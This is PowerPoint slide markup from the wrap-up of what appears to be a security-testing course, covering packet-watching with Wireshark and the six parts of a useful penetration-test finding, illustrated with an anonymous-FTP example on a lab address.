        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Try this at home:  </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>run your scans again with Wireshark open, and watch the SYN packets go out and the RSTs come back. Twenty minutes of that will teach you more about TCP than an hour of theory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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0B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text 0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="347472"/>
            <a:ext cx="7315200" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="140" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>08 / WRAP UP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="603504"/>
            <a:ext cx="11155680" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The report is the deliverable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>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59</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1463040"/>
            <a:ext cx="11064240" cy="411480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A finding somebody can act on has six parts. Anything less and it gets ignored, or worse, argued with.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2057400"/>
            <a:ext cx="5440680" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2194560"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="2532888"/>
            <a:ext cx="4983480" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Anonymous FTP access on 192.168.56.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2057400"/>
            <a:ext cx="5440680" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="2194560"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Severity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="2532888"/>
            <a:ext cx="4983480" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Medium, with a short justification. Do not just paste a CVSS number</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3291840"/>
            <a:ext cx="5440680" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="3429000"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Affected</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="3767328"/>
            <a:ext cx="4983480" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The exact host, port and service version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3291840"/>
            <a:ext cx="5440680" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="3429000"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Evidence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="3767328"/>
            <a:ext cx="4983480" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The command you ran and the output, unedited</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4526280"/>
            <a:ext cx="5440680" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="4663440"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reproduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804672" y="5001768"/>
            <a:ext cx="4983480" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Steps that a system administrator can follow without you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="4526280"/>
            <a:ext cx="5440680" cy="1051560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6087"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="4663440"/>
            <a:ext cx="4937760" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Remediation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428232" y="5001768"/>
            <a:ext cx="4983480" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What to change, specifically. Disable anonymous, not improve security posture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="5989320"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Write it while the shell is still open. Reconstructing evidence three days later is how details get invented.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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0B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6803136"/>
            <a:ext cx="12191695" cy="54864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1965960"/>
            <a:ext cx="8229600" cy="1097280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713232" y="3108960"/>
            <a:ext cx="7315200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ask now, or send them by email. Both work.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
